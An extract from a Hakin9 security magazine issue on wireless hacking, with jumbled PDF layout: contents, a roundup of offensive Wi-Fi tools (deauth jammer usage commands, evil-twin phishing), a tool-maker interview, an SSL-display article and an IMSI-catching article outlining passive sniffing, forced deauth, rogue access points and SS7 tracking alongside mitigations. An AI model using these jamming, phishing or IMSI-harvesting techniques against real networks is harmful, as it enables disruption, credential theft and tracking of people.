TEAM Proofreaders

&
Editor-in-Chief Betatesters:
Joanna Kretowicz
[email protected]
Lee McKenzie
Editors:

Marta Sienicka Avi Benchimol

[email protected]
Bernhard Waldecker
Marta Strzelec
[email protected] Hammad Arshed

Marta Ziemianowicz Ivan Gutierrez Agramont

[email protected]
John Webb
Proofreader:
Lee McKenzie
Jose Luis Herrera
Senior Consultant/Publisher:
Paweł Marciniak David von Vistauxx

CEO: Tom Updegrove

Joanna Kretowicz
[email protected] Diane Barrett
Marketing Director:
Felipe Martins
Joanna Kretowicz
[email protected]
Gmn
DTP
Marta Sienicka K S Abhiraj
[email protected]
greg mckoy
Cover Design
Hiep Nguyen Duc Hani Ragab

Publisher Amit Chugh

Hakin9 Media Sp. z o.o.
02-676 Warszawa Arthur Tumanyan
ul. Postępu 17D
Phone: 1 917 338 3631 Da Co

www.hakin9.org devzero2000

All trademarks, trade names, or logos mentioned or used are the

property of their respective owners.

The techniques described in our articles may only be used in private,

local networks. The editors hold no responsibility for misuse of the
presented techniques or consequent data loss.
Dear Readers!

We present you new issue of Hakin9! This time we decided to focus on one of

the most popular topic - Wireless Hacking.

As always we prepared for you few github projects related to wireless hacking. I

hope that you will find useful! Many of our articles are related to the main

theme, you will have a chance to learn all about Aircrack-ng, Anthony Caldwell

prepared a simple and informative guide dedicated to this tool. Carlos Manzo

Trujillo will teach you how to use wireless techniques to hack drones. For those

of you that just started learning about wireless hacking, Uche Akajiuba will show

you how hack WPA2-PSK with Kali Linux. You don’t want to miss it!

To take a break from wireless topics, Sumit Kumar Soni presents System Harden-

ing tools and tips for Windows and Linux. Samrat Das wrote about CASB, if you

don’t know what it is, now it’s your chance to find more about this fascinating

topic.

Enjoy the issue,

Hakin9 Team
Github Corner
7
Wireless Hacking Edition

“We created URH to be both, powerful and easy to

use” - interview with Johannes Pohl and Andreas Noack creators
19
of Universal Radio Hacker
by Marta Strzelec and Marta Sienicka

The Development of Displaying SSL Certificates in a

Browser 23
by Jindrich Zechmeister

IMSI Catching Over WIFI Networks: Exposing WIFI-

Offloading 29
by Loay Abdelrazek

Python - Practice and functionality

35
by Omar Ahmed

CASB - Cloud Access Security Broker

50
by Samrat Das

New hacking era: wireless hacking by drones

60
by Carlos Manzo Trujillo

5
WIFI Hacking
81
by Pprasoon Nigam

Wireless Hacking with Aircrack-ng

99
by Anthony Caldwell

Hacking WPA2-PSK With Kali Linux

by Uche Akajiuba
106

System Hardening Tools and Tips

117
by Sumit Kumar Soni

Emulating Firmware for Blind Command Injection

131
by Nitesh Malviya

6
GITHUB CORNER -
WIRELESS
HACKING EDITION
 ##Infernal-Wireless v2.6
Infernal-
Wireless Release 2.6.11
This is
##Features added and improved:
automated
wireless • Menu to retrieve logs are added
hacking tool
##Infernal-Wireless v2.6

Release 2.6.10

##Features added and improved:

• Added BeeF XSS framework Integration

• Added HTTP Traffic View within tool

• Improved Infenral Wireless Attack

• Visual View of some of the panel improved

• Improved Basic Authentication during Social engineering assessment over

wireless network

8
 Github Corner - Wireless Hacking Edition

Infernal-Wireless v2.6 7. WPA2 Hacking UI is changed for better con-

trol over the attack

This tool is created to aid the penetration testers in as-

sessing wireless security. Author is not responsible for 8. WPA2 Enterprise Hacking UI is changed for
misuse. Please read instructions thoroughly. better control over the attack

Usage: python InfernalWireless.py (from the same folder 9. Custome Fake Access Point is implemented.
where your code exists) Freenet AP is deleted now.

For any comments and suggestions please email on 10. Check for software updates
1337[@]gmail[dot]com
11. Wiki page with video links to attacks tutorials
##BUG Fixes:
12. Folder are more structured
1. Non ASCII SSID Name used to crash the soft-
13. Check for prerequisites automatically
ware. It is fixed now

2. Warnings on the background is suppressed Coming Soon:

• Parsing t-shark log files for gathering creds and

3. New Experimental Section is added but under
more
development

• More attacks.
Release Notes:

1. Better User Interface Expected bugs:

• Wireless card might not be supported

2. More Network device controls

• Might crash on Windows

3. Better SSL Strip Control

• Freeze
4. User / Access Point Deauthentication with

auto channel detection of AP • A lot of work to be done, but this tool is still be-

ing developed.
5. Extra Wireless Scanner to detect Probe Re-

quests, wireless Network scan and connec-

tions to AP detection
More at:
6. airgraph-ng suite is better implemented https://github.com/entropy1337/infernal-twin

9
RogueSploit RogueSploit is an open source automated script made to create a Fake Acces

Point, with dhcpd server, dns spoofing, host redirection, browser_autopwn1 or

A Powerfull WiFi autopwn2 or beef+mitmf.
Social Trap
TO DO LIST:

• BeEF; [DONE]

• Add MITMF; [DONE]

• Add BDFProxy;

• Add SEToolkit;

• Use hostapd as FakeAP;

• Add some features;

ONLY FOR LEGAL / AUTHORIZED / STUDY PURPOSES

10
 Github Corner - Wireless Hacking Edition

What you need: pid, don't be an asshole, and use this tool responsibly

and legally.
• Aircrack-ng Suite
[https://github.com/aircrack-ng/aircrack-ng] More at: https://github.com/B4ckP0r7/RogueSploit

• Dhcpd server

• Metasploit Framework
[https://github.com/rapid7/metasploit-framework
]

• Browser Exploitation Framework

[https://github.com/beefproject/beef]

• dnsmasq

• GNU / Linux based Operating Sistem

[https://kali.org]

• External Wireless Interface like TP-Link TL-

WN722N

• Zenity

• Hostapd

• Social Engineer Toolkit

[https://github.com/trustedsec/social-engineer-to
olkit]

• MITMF [https://github.com/byt3bl33d3r/MITMf]

DISCLAIMER

RogueSploit is intended to be used for legal security pur-

poses only, and you should only use it to protect hosts

you own or have permission to test. Any other use is not

the responsibility of the developer. Be sure that you un-

derstand and are complying with the RogueSploit li-

censes and laws in your area. In other words, don't be stu-

11
Wifijammer Continuously jam all wifi clients and access points within range. The effectiveness

of this script is constrained by your wireless card. Alfa cards seem to effectively
Continuously jam within about a block radius with heavy access point saturation. Granularity is
Jam All Wifi given in the options for more effective targeting.

Clients/Routers
Requires: python 2.7, python-scapy, a wireless card capable of injection

Usage

Simple

python wifijammer.py

This will find the most powerful wireless interface and turn on monitor mode. If a

monitor mode interface is already up it will use the first one it finds instead. It will

then start sequentially hopping channels 1 per second from channel 1 to 11 identify-

ing all access points and clients connected to those access points. On the first pass

through all the wireless channels it is only identifying targets. After that the 1sec

per channel time limit is eliminated and channels are hopped as soon as the

12
 Github Corner - Wireless Hacking Edition

deauth packets finish sending. Note that it will still add • -t, Set a time interval of .00001 seconds be-

clients and APs as it finds them after the first pass tween sending each deauth (try this if you get a

through. scapy error like 'no buffer space').

Upon hopping to a new channel it will identify targets • -s, Do not deauth the MAC DL:3D:8D:JJ:39:52.

that are on that channel and send 1 deauth packet to the Ignoring a certain MAC address is handy in case

client from the AP, 1 deauth to the AP from the client, you want to tempt people to join your access

and 1 deauth to the AP destined for the broadcast ad- point in cases of wanting to use LANs.py or a Pine-

dress to deauth all clients connected to the AP. Many apple on them.

APs ignore deauths to broadcast addresses.

• -d, Do not send deauths to access points' broad-
python wifijammer.py -a 00:0E:DA:DE:24:8E cast address; this will speed up the deauths to the
-c 2
clients that are found.

Deauthenticate all devices with which 00:0E:DA:DE:24:8E

• --world, Set the max channel to 13. In N. Amer-
communicates and skips channel hopping by setting the
ica the max channel standard is 11, but the rest of
channel to the target AP's channel (2 in this case). This
the world uses 13 channels so use this option if
would mainly be an access point's MAC so all clients as-
you're not in N. America.
sociated with that AP would be deauthenticated, but you

can also put a client MAC here to target that one client More at: https://github.com/DanMcInerney/wifijammer

and any other devices that communicate with it.

Advanced

python wifijammer.py -c 1 -p 5 -t .00001

-s DL:3D:8D:JJ:39:52 -d --world

• -c, Set the monitor mode interface to only lis-

ten and deauth clients or APs on channel 1.

• -p, Send 5 packets to the client from the AP and

5 packets to the AP from the client along with 5

packets to the broadcast address of the AP.

13
WiFiPhisher Wifiphisher is a security tool that mounts automated victim-customized phishing

attacks against WiFi clients in order to obtain credentials or infect the victims with
Automated malwares. It is primarily a social engineering attack that unlike other methods it
victim- does not include any brute forcing. It is an easy way for obtaining credentials from

customized captive portals and third party login pages (e.g. in social networks) or WPA/WPA2

pre-shared keys.
phishing attacks
against Wi-Fi Wifiphisher works on Kali Linux and is licensed under the GPL license.

clients
How it works

After achieving a man-in-the-middle position using the Evil Twin attack, Wifiphisher

redirects all HTTP requests to an attacker-controlled phishing page.

From the victim's perspective, the attack makes use in three phases:

1. Victim is being deauthenticated from her access point. Wifiphisher con-

tinuously jams all of the target access point's wifi devices within range

by forging “Deauthenticate” or “Disassociate” packets to disrupt exist-

ing associations.

14
 Github Corner - Wireless Hacking Edition

2. Victim joins a rogue access point. Wifiphisher • One wireless network adapter that supports AP

sniffs the area and copies the target access mode. Drivers should support netlink.

point's settings. It then creates a rogue wire-

• One wireless network adapter that supports Moni-
less access point that is modeled by the tar-
tor mode and is capable of injection. Again, driv-
get. It also sets up a NAT/DHCP server and
ers should support netlink. If a second wireless
forwards the right ports. Consequently, be-
network adapter is not available, you may run the
cause of the jamming, clients will eventually
tool with the --nojamming option. This will turn
start connecting to the rogue access point.
off the de-authentication attack though.
After this phase, the victim is MiTMed.

More at: https://github.com/wifiphisher/wifiphisher

3. Victim is being served a realistic specially-

customized phishing page. Wifiphisher em-

ploys a minimal web server that responds to

HTTP & HTTPS requests. As soon as the victim

requests a page from the Internet, wifiphisher

will respond with a realistic fake page that

asks for credentials or serves malwares. This

page will be specifically crafted for the victim.

For example, a router config-looking page will

contain logos of the victim's vendor. The tool

supports community-built templates for differ-

ent phishing scenarios.

Requirements

Following are the requirements for getting the most out

of Wifiphisher:

• Kali Linux. Although people have made Wifi-

phisher work on other distros, Kali Linux is the offi-

cially supported distribution, thus all new features

are primarily tested on this platform.

15
FruityWifi FruityWifi is an open source tool to audit wireless networks. It allows the user to de-

ploy advanced attacks by directly using the web interface or by sending messages
Wireless to it.
network
Initially the application was created to be used with the Raspberry-Pi, but it can be
auditing tool
installed on any Debian based system.

FruityWifi v2.0 has many upgrades. A new interface, new modules, Realtek chipsets

support, Mobile Broadband (3G/4G) support, a new control panel, and more.

Now it is possible to use FruityWifi combining multiple networks and setups:

• Ethernet Ethernet,

• Ethernet 3G/4G,

• Ethernet Wifi,

• Wifi Wifi,

• Wifi 3G/4G, etc.

16
 Github Corner - Wireless Hacking Edition

Within the new options on the control panel we can The main function of Tcpdump is to analyze network traf-

change the AP mode between Hostapd or Airmon-ng fic. With this module we can intercept the traffic passing

allowing to use more chipsets like Realtek. through the device, filter it and/or store it for post analy-

sis.
It is possible customize each one of the network inter-

faces which allows the user to keep the current setup or Among the new features FruityWifi now supports Mobile

change it completely. Broadband (3G/4G). We can use this module to connect

a 3G/4G dongle and give internet access to FruityWifi

FruityWifi is based on modules making it more flexible.
without the need of Wifi or Ethernet.
These modules can be installed from the control panel to

provide FruityWifi with new functionalities. Ettercap is a tool able to capture network traffic and per-

form different attacks. With this module we can perform

Within the available modules you can find URLsnarf,
MITM attacks using ARP poisoning.
DNSspoof, Kismet, mdk3, ngrep, nmap, Squid3 y

SSLstrip (code injection functionality), Captive Portal, More at:

AutoSSH, Meterpreter, Tcpdump and more.

http://www.fruitywifi.com/index_eng.html

AutoSSH allows the user to create a reverse ssh connec-

https://github.com/xtr4nge/FruityWifi
tion, restarting it in case that the connection has been

closed or dropped. It is useful to keep a permanent con-

nection with FruityWifi.

Meterpreter is an outstanding tool to gather informa-

tion from a compromised host, manipulate system proc-

esses and/or kill them, and more. This module allows Frui-

tyWifi to compromise more hosts and use them to access

more devices and networks.

Nessus is a vulnerability scanner. With this module it is

possible to scan hosts from FruityWifi without using the

Nessus interface. We can discover the vulnerabilities pre-

sent on each of the hosts to understand the attack sur-

face and compromise them.

17
 The Universal Radio Hacker is a software for investigating unknown wireless proto-
Universal cols. Features include
Radio Hacker
• hardware interfaces for common Software Defined Radios
investigate
wireless • easy demodulation of signals
protocols like a
boss • assigning participants to keep overview of your data

• customizable decodings to crack even sophisticated encodings like

CC1101 data whitening

• assign labels to reveal the logic of the protocol

• fuzzing component to find security leaks

• modulation support to inject the data back into the system

Check out the wiki for more information and supported devices.

Like to see things in action? Watch URH on YouTube!

More at: https://github.com/jopohl/urh

18
“WE CREATED URH TO BE BOTH
POWERFUL AND EASY TO USE”
INTERVIEW WITH JOHANNES POHL AND ANDREAS
NOACK CREATORS OF UNIVERSAL RADIO HACKER
[Hakin9 Magazine]: Hello Johannes and Andreas! [H9]: Where did the idea of creating the Universal

Thank you for agreeing to the interview, we are Radio Hacker come from?

honored! How have you been doing? Can you tell us

something about yourself? [JP]: There was this one situation where we were sitting

in front of a complex GNU Radio graph and thought to

[Johannes Pohl]: I am a PhD student with a strong ourselves „Why does this have to be so complicated?

focus on offensive security. Programming Python is my We just want the bits!“ At that time, we had to record a

passion next to working with Software Defined Radios signal with GNU Radio, export it to WAV and open that

and hacking wireless protocols or dealing with Artificial WAV in audacity to manually count bits. This was kind

Intelligence. of annoying, not speaking about the dependency hell

[Andreas Noack]: I am a professor for communication involved to install GNU Radio at that time.

systems at the University of Stralsund, dealing with IT [AN]: As Johannes said, we just wanted to extract bits

security and cryptography for many years now. From from a raw signal, although we didn’t understand the

my PhD thesis on, I am engaged with wireless security HF black magic at that time. The basic idea was to

(wireless lan, meshing). Working with software defined enable theoretic researchers to deal with the physical,

radios was quite new to me as I have a strong especially wireless, world without strong knowledge in

cryptographic background. electrical engineering.

[H9]: Can you tell us more about Universal Radio [H9]: Who would you recommend URH to? Who do

Hacker (URH)? you think needs it the most, and why? Is it just

people doing similar work to yours?

[JP]: The Universal Radio Hacker is a suite for

investigating unknown wireless protocols. It helps you [JP]: URH may be useful for anyone dealing with

in many ways, from capturing the raw wireless signal wireless protocols: from the beginner, who wants to

over getting the bits out of the waveforms to reverse see the bits flying through the air, to the cryptograph

engineering the protocol‘s logic. Furthermore, you can assessing the security of an IoT protocol

apply fuzzing to your estimation of the protocol and implementation.

penetrate innocent IoT devices.

[AN]: URH was first developed in 2014, at first under

the name automatic hacker that we dropped before

going to public. One of our main goals is to provide a

user friendly way to analyze signals.

20
[AN]: In the first line, URH was designed to support [JP]: As Andreas said, a basic understanding of HF is

cryptographers and security researchers without deep required. However, you may also use URH as a

HF knowledge in analyzing and pentesting proprietary „learning by doing“ tool, because we put a lot of effort

digital wireless protocols. Providing an into generating graphical previews and feedback. For

as-easy-as-possible interface for SDRs, URH is, of example, you will see your signal oscillating faster in

course, also suited for all the people that just like to the preview, if you increase the frequency in the

play around with their IoT devices at home. modulation dialog.

[H9]: What was the most challenging part in creating

URH?

[JP]: GUI.

[AN]: Like summarized by Johannes, we had a lot of

discussions about usability and the ergonomic design

of URH. There was a lot of time going into graphical

and usability features that seemed needless at the

beginning. However, we are happy about the process

when looking at the final outcome.

[H9]: What is needed to start using URH? How much

knowledge do you have to possess to use it

effectively?
Johannes Pohl (left), [Prof. Dr.] Andreas Noack
(right)
[AN]: Well, some basic HF knowledge (i.e. you know

that there are different wireless modulations, you know

[H9]: What about the feedback from github
what 'sample rate' means) should be sufficient to start
community? Does it influence your software?
working with URH. We are trying to provide an easy

access but working with SDRs can nevertheless become

[JP]: Of course! The feedback of our community is
quite complex. Our philosophy is to provide a tradeoff
important to us and has a great influence on the
between easy-to-use, i.e. only necessary options are
development. In the end, we created URH to be both,
shown by default, and a complex configuration to
powerful and easy to use, and therefore are happy to
satisfy professionals at the same time. This is, however,
see it used and have the ability to improve it.
not always that simple…
21
[AN]: In the first years of URH, we only had our own [AN]: To name one, we will get a simulator component

viewpoints and technical demands. This changed with in late 2017 that allows us to build a complete wireless

the release on GitHub. With all the feedback and protocol over several dependent messages including

features requests (not to forget bug reports) we are state machine. With this component, you are able to

able to make URH more ‚universal‘ to use. create, for example, a virtual IoT device that you can

talk with, maybe to trigger cryptographic messages

[H9]: Have you found any aspect of working with a that can be cryptanalyzed offline.

community difficult?

[H9]: Do you have any thoughts or experiences you

[JP]: I found the most challenging part to support the would like to share with our audience? Any good

various combinations of operating systems and libraries advice?

used by community members. Maintaining a cross

platform application is harder than it sounds, especially [JP]: If you maintain an OpenSource project, use

when it comes to compiling C++ extensions with GitHub’s awesome integrations! To name a few:

different compilers and even varying standard libraries. TravisCI automatically tests (you follow TDD, right?)

[AN]: There are two different worlds. On the one hand your code on each push in your Git repository,

there are beginners, who are, for example, struggling CodeClimate monitors the health of your code, e.g.

with the installation or some basic functionalities of the how good your tests cover your code or how many

program. On the other hand, there are professionals code redundancies you have.

who ask for more features and more complex options. [AN]: A software you develop grows and becomes

To meet the demands of both worlds, there are more complex. If a software reaches a particular size or

sometimes big discussions about whether a feature complexity, you should think about software

should be implemented or not. engineering techniques (e.g. test driven development,

as Johannes already suggested). GitHub will support

[H9]: Any plans for the future? Are you planning to you with several plugins by doing that.

expand your tool, add new features?

[H9]: Thank you!

[JP]: Currently, URH is released in versions 1.x.x.x. We

have many plans for future major releases up to version

3.x. Great things are coming :-) Furthermore, we are

planning to contribute some scientific papers about

wireless reverse engineering and IoT security.

22
THE DEVELOPMENT OF
DISPLAYING SSL CERTIFICATES IN
A BROWSER

by Jindrich Zechmeister
 The Development Of Displaying SSL Certificates In A Browser

Displaying an SSL certificate in a browser is one of the aspects of using the internet. This originally unremarkable
problem has gradually become a big topic, which affects not only security, but marketing as well. Let us look at how
displaying SSL certificates in browsers has developed. You might be surprised how often this changes and how much it
has deviated from its original purpose.

The beginningS
Encrypting the web with an SSL certificate has its origins in the 1990s. One of the first certification authorities –
Thawte – was founded in 1995 and is still very popular today. The HTTP and HTTPS web protocols for encrypted web
have been with us (with forced modernization) for 20 years.

Connecting to the internet was not common for computer users at the time, and web encrypting was an exception.
Besides, until 2007, there were only two types of certificates – simple ones without information about the owner
(domain validated, DV), and certificates with verified information about the owner (organization validated, OV).

As a result, the lock icon appeared in the status bar (typically in Internet Explorer 7 and 8 browsers). The situation
started changing with new competition, and browsers started informing users about HTTPS more. In its first version
(2004), Firefox used a lock icon similar to Explorer, but later it highlighted certificates in blue.

In its very first version (2009), Chrome dealt with displaying certificates in a similar way. However, as it already knew
EV certificates, it was able to write the details of the organization.

The arrival of ev certificateS

In 2007, CAB forum (certification authority browser forum) released a new certificate type with extended verification.
Its main contribution was to display the name of the organization next to the address bar. This item is called “EV green
bar“ - and it really was green in the past.

In the older versions of Internet Explorer, the whole web address bar with an EV certificate had a green background.
This very noticeable feature was, unfortunately, used only in Microsoft browsers. Nowadays, the browsers do not

24
 The Development Of Displaying SSL Certificates In A Browser

display a whole line with coloured background, but only a small part with the name of the organization next to the
address bar. This was probably the ideal version of displaying an EV certificate.

Recently, there has been a trend of “decoloring” the green bar, which was started by Mozilla. Their “green bar” has
been getting gradually lighter over the years, and now it is more white than green, with very subtle green text. For a
user, this is certainly less beneficial than in the past. Chrome has adopted this colouring and the originally green
address bar looks almost identical in both browsers.

The Development of Mobile Devices

After the introduction of the first iPhone 2007, smartphones and later tablets grew in popularity. Most internet users
nowadays access the internet from a mobile device rather than a desktop.1

In mobile browser versions, a typical black lock usually symbolizes SSL certificates on a website. An EV certificate is
not displayed as a green bar but as the name of the organization in green font.

These days, mobile devices can deal with certificates without problems, the same as desktops. However, displaying the
certificate detail is more complicated because it is done by tapping the lock icon, which requires dexterity.

1.See the statistics Desktop vs Mobile vs Tablet Market Share Worldwide. 25

http://gs.statcounter.com/platform-market-share/desktop-mobile-tablet
 The Development Of Displaying SSL Certificates In A Browser

Revolution of Microsoft with Edge

A true revolution – but not in a positive sense of the word – was caused by Microsoft's browser EDGE. In 2015, it
issued a successor for Internet Explorer, which shocked, besides other things, by the fact that it does not enable
display of an SSL certificate's detail on a website. Therefore, you cannot view its detail, and its authentication aspect
with the data verified by a certification authority is compromised. You can see the name of the organization in a green
bar only in the case of EV certificates with extended verification.

Simplifying Security Indicators

At the end of 2016, Google published the results of a study, which was looking for ideal security symbols for security
warnings in a browser. Because of this study, three new symbols were created in order to simplify the browser
notifications. The survey established that for these symbols, the icon is significant, not the colour. It turned out that
browser users do not mind whether the warning is red, blue or black; the colour is not directly related to the character
of the message and the majority does not understand red as a warning. Therefore, Chrome focuses mainly on a clear
symbol and it displays one of three symbols for different statuses – a green lock, an informative “i” and a red triangle.

Firefox is planning to adopt the results of the study, but for now, it uses its own symbols. An average certificate is
displayed with a green lock, and an EV certificate has the name of the organization in green letters on a light bar.

Hiding the Certification Detail Due to Simplification

These days, we have been witnessing the greatest simplification of browsers. Microsoft's Edge did not worry about
certificates and simplified them. Now it is not possible to find information about a certificate. Apparently, Google got
inspired and probably also believes that certificate details are not useful for the user. After clicking on the green bar or
on the lock icon, the certificate details do not show, you have to use the F12 button to see them.

Mozilla does display the certificate detail, albeit after several clicks. However, if there is a security problem (e.g. if you
receive an untrustworthy certificate), there are problems with displaying it. The certificate is displayed in Base64,
which is too complicated for most users.

26
 The Development Of Displaying SSL Certificates In A Browser

What next?
Securing websites is a hot topic now and it certainly receives the most attention. Almost every internet user is,
nowadays, aware how important it is to protect their personal and confidential information. After 10 years with EV
certificates, the market has reached the point when they are not only used by banks and financial institutions, and
website owners consider it a benefit to their visitors when the certificates' importance, from the authentication point of
view, is respected.

Therefore, it is surprising that browser producers have decided to remove certificate details, despite the fact that they
have tried to teach users for years to check their own security. One possible explanation might be the future
development of HTTP/2 and the fact that all domains will be secured by a certificate in the future. Nevertheless, even
then it will be desirable to check certificate information and origins on the website.

I hope that the occurring problems will be noticed by browser producers and that they will go back to the conservative
design. If that is not the case, we will have to verify the certificate details on a website with OpenSSL, which is not very
user friendly.

27
 The Development Of Displaying SSL Certificates In A Browser

ABOUT THE AUTHOR

Jindrich Zechmeister

SSL certificates specialist and SSLmarket manager, which is

Symantec Website Security Platinum Partner. This highest level of

partnership with the family of Symantec certification authorities

proves our competence in the area of SSL certificate security and

the ability not only to sell certificates but to bring added value to

customers and help them with the complete security of their servers. SSLmarket is present in many

countries as France, UK, USA, Germany and eastern Europe.

28
IMSI CATCHING OVER WIFI
NETWORKS: EXPOSING
WIFI-OFFLOADING

by Loay Abdelrazek
 IMSI Catching Over WIFI Networks: Exposing WIFI-Offloading

Introduction
IMSI (International Mobile Subscriber Identity) catchers have been widely known in 3G mobile networks as a
malicious device to intercept and eavesdrop mobile traffic and tracking users, considered a type of man-in-the-middle
attacks. This type of attack has been aroused in wifi networks as well.

Wifi networks that operate over 2G-4G protocols, better known as Wifi-offloading, has been an emerging concept
adopted by mobile operators for several years to relieve the congested mobile data networks with additional capacity
from the unlicensed Wifi spectrum.

Wifi offloading architecture relies heavily on the mobile operator's infrastructure as the users are authenticated via
their SIM/(U)SIM cards as the normal defined 3GPP mobile authentication mechanism.

The architecture of wifi offloading solutions mainly consists of the wireless access point that the user attaches to and
depends on the operator’s core infrastructure that is responsible for authenticating, using an EAP based AAA server
that is connected to the operator's Home Location Register, known as HLR (HLR is the operator's database that is
responsible to store the details of every authorized subscriber), a WLC (WLAN Controller) that acts as a DHCP and
leases IP, and the GGSN (GPRS Gateway Serving Node) that acts as a gateway to the internet. The below diagram gives
a high level view on how wifi offloading architecture depends much on the same core nodes as 3G/4G.

Fig 1. WiFi offloading Architecture

Traffic Flow
The sequential traffic flow for user equipment (UE) on a 3G/4G wifi network is described as the below:
1. The subscriber associated to SSID.
2. 802.1x EAP-SIM/AKA request to AP.
3. WLC sends RADIUS auth-request.
4. AAA server checks SIM credentials with HLR using MAP over the SS7 network.
5. After successful authentication, WLC leases an IP address to subscriber.
30
 IMSI Catching Over WIFI Networks: Exposing WIFI-Offloading

6. Subscriber traffic is now directed to the GGSN to have internet access.

WIFI offloading Authentication Vulnerability

EAP is Extensible Authentication Protocol, which can be used to create new types of authentication protocols for
Radius. EAP-SIM/AKA are one of those new types of authentication commonly used in WLANs.

EAP-SIM/AKA are designed for use with existing GSM/3GPP authentication systems (AuC, HLR/HSS) and
SIM/USIM cards. EAP-SIM/AKA standards allow WLAN users to authenticate access to wireless networks using
mobile SIM cards.

Fig 2. High Level Authentication Procedure (Source: Cisco Networks)

The above figure shows an overview of the authentication procedure. The UE communicates with an EAP server that is
located on an authentication server using AAA.

The first EAP request issued by the authenticator (EAP Server) is EAP-Request/Identity. On full authentication, the
UE’s EAP-Response/Identity includes the IMSI.

GSM subscribers are identified with IMSI. The IMSI is a string of not more than 15 digits. It is composed of a three
digit Mobile Country Code (MCC), a two or three digit Mobile Network Code (MNC), and a Mobile Subscriber
Identification Number (MSIN) of no more than 10 digits.

Fig 3. IMSI Structure

31
 IMSI Catching Over WIFI Networks: Exposing WIFI-Offloading

The vulnerability found in this authentication mechanism is that the user identity is transported in clear text upon
first AAA server-UE handshaking, making anyone in the vicinity of the access point able to passively eavesdrop and
catch the IMSI of the attached users. This is a vulnerability in the implementation of this architecture in mobile
operators, and the way the EAP-SIM was standardized, as stated by the EAP-SIM RFC4186, the user identity privacy
method used for authentication is an optional method, it's up to the operator to implement it or not.

The criticality of exposing the subscriber's IMSI is that it is the main attribute in mobile networks used for various
operations, not limited to the following: Subscriber authentication, routing of calls, location identification, routing of
SMS, routing of data, charging, subscriber’s subscription profile modifications, and many more. Thus, exposing the
IMSI of a subscriber may have a severe impact on user’s privacy as it could be used in man-in-the-middle attacks,
location tracking and fraud. The impact does not affect user’s privacy only, but the operators themselves; DDoS
attacks could be launched on the operator's infrastructure using other complementing techniques, all of that resulting
from exposing a single piece of data, yet a critical one, the IMSI.

Exploiting the EAP-SIM

This proof of concept was run on one of the operators on their 3G WiFi network. Unlike the well known GSM IMSI
catchers, better known for stingrays, the methods used to exploit this vulnerability are quite simple, it could be
exploited using a wifi adapter, i.e TP-Link 722N, or the laptop’s built-in adapters could do the job, if only doing passive
attacks.

The passive attack vector for this vulnerability occurs if an attacker runs a wifi sniffer, captures the initial interaction
and observes the IMSI transported in the initial EAP/Response in the AT_INDETITY attribute. The IMSI will also be
seen if the fast re-authentication fails and full authentication occurs once again.

Fig 4 .Wifi IMSI Catcher

As shown in the above packet, this is an EAP packet response and of a type identity as shown in the code attribute (2)
and identity attribute (1), respectively, in the EAP layer of the packet. The last attribute in this layer is the identity used
by the UE, in this case, it’s the IMSI which takes the following form:
[email protected].
When IMSI is used as identifiers, the first digit is “1” followed by the country code (MCC: 602, Egypt) followed by the
2-3 digits of operator code (MNC), followed by MSIN digits.

32
 IMSI Catching Over WIFI Networks: Exposing WIFI-Offloading

What makes this type of attack extensively critical is that the normal wireless hacking techniques could be easily
adopted, after all, it's a pure wireless communication inheriting all of its characteristics between the UE and the
wireless access point. Thus, even if a user is attached to the SSID, the attacker could send a simple de-authentication
packet which will force the UE to re-authenticate sending its IMSI again.

This attack could be achieved even if the attacker is not in the vicinity of a 3G/4G wifi SSID, the attacker can monitor
the broadcast packets over the air. By default, the UE will send probe requests to the SSIDs stored in their preferred
list on the handsets, thus there is a probability to easily to identify the users and set up a rogue access point to accept
the request, then craft an EAP packet to request the user's identity, which is, in this case, the IMSI.

Impact of the attack

Attackers never focus on only one technique or methodology for attacking, instead they complement it with all
available and relevant techniques. As mentioned earlier, the aftermath of exposing the IMSI could be used for further
attacks, like location tracking, interception, etc. With the emerging new attack vectors on the telecom infrastructure
and protocols, this could be achieved by using the SS7 protocol vulnerability.

Location tracking could be achieved by using the IMSI as a parameter to the MAP-ProvideSubsciberInfo message as
described below:

Fig 5. Using SS7 to track location via IMSI

Upon sending the ProvideSubscriberInfo request to the operator’s MSC/VLR that is responsible to temporarily store
the location of the user, the response will include, but is not limited to, the following important information:
● Cell ID
● GPS location (if available)
● IMEI (hardware serial number) of handset

With this information, the GPS and Cell ID could be looked up in an open source Cell ID database, like
(opencellid.org) thus knowing the exact location of the target wherever located. Knowing the IMEI will reveal the exact
vendor of the handset giving the attacker the opportunity to customize a dedicated malware for this specific vendor.

33
 IMSI Catching Over WIFI Networks: Exposing WIFI-Offloading

Mitigation

EAP-SIM includes optional identity privacy (anonymity) support that can be used to hide the clear text permanent
identity and thereby make the subscriber’s EAP exchanges untraceable to eavesdroppers. Because the permanent
identity never changes, revealing it would help observers to track the user.

Identity privacy is based on temporary identities, or pseudonyms, that is created by the EAP server, which are
equivalent to but separate from the Temporary Mobile Subscriber Identities (TMSI) that are used on cellular
networks.

The EAP server transmits pseudonym usernames to the peer in cipher, using the AT_ENCR_DATA attribute in the
EAP-Request/SIM/Challenge after the first full authentication is done. Upon successful first full authentication, and
the encrypted data includes a pseudonym user-name, then the peer may use the obtained pseudonym user-name on
the next full authentication. The EAP server holds a mapping between the IMSI and its correspondent pseudonyms.
This pseudonym is also recommended to be used in fast-authentication.
As shown in the exploitation section, wireless hacking techniques could be adopted along with setting a rogue access
point. This should be resolved by the operators enforcing the use of EAP-AKA instead of EAP-SIM. By standard AKA
authentication mechanism is adopted for 3G authentication using the USIM cards, which ensure mutual
authentication, unlike EAP-SIM, not only the network will authenticate the subscriber, but the subscriber will get to
authenticate the network itself to make sure it's his operator by solving a challenge.

Securing the user’s identity with pseudonyms configuration on the EAP servers mobile operators and using mutual
authentication implemented in EAP-AKA will ensure privacy of the subscribers against the emerging attacks on
mobile users.

ABOUT THE AUTHOR

Loay Abdelrazek

Loay Abdelrazek has been in the security field for around more than three

years , A security researcher and enthusiast focusing on the field of telecom

security with an aim to provide better practical solutions to the telecom

sector to further enhance the security of their infrastructure whether it's in at

user equipment layer, access layer, core layer and interconnects of telecom

operators. Also interested in open source security solutions.

34
PYTHON - PRACTICE
AND FUNCTIONALITY

by Omar Ahmed
 Python - Practice And Functionality

In the past, there were a lot of programming languages you can use to make your own penetration testing tools, but
there was usually one that was the most popular and was your first choice when you thinking about choosing a
programming language to make a penetration testing tools, like Perl. Lately, programming languages like Python and
Ruby have been widely adopted and proved their usefulness.

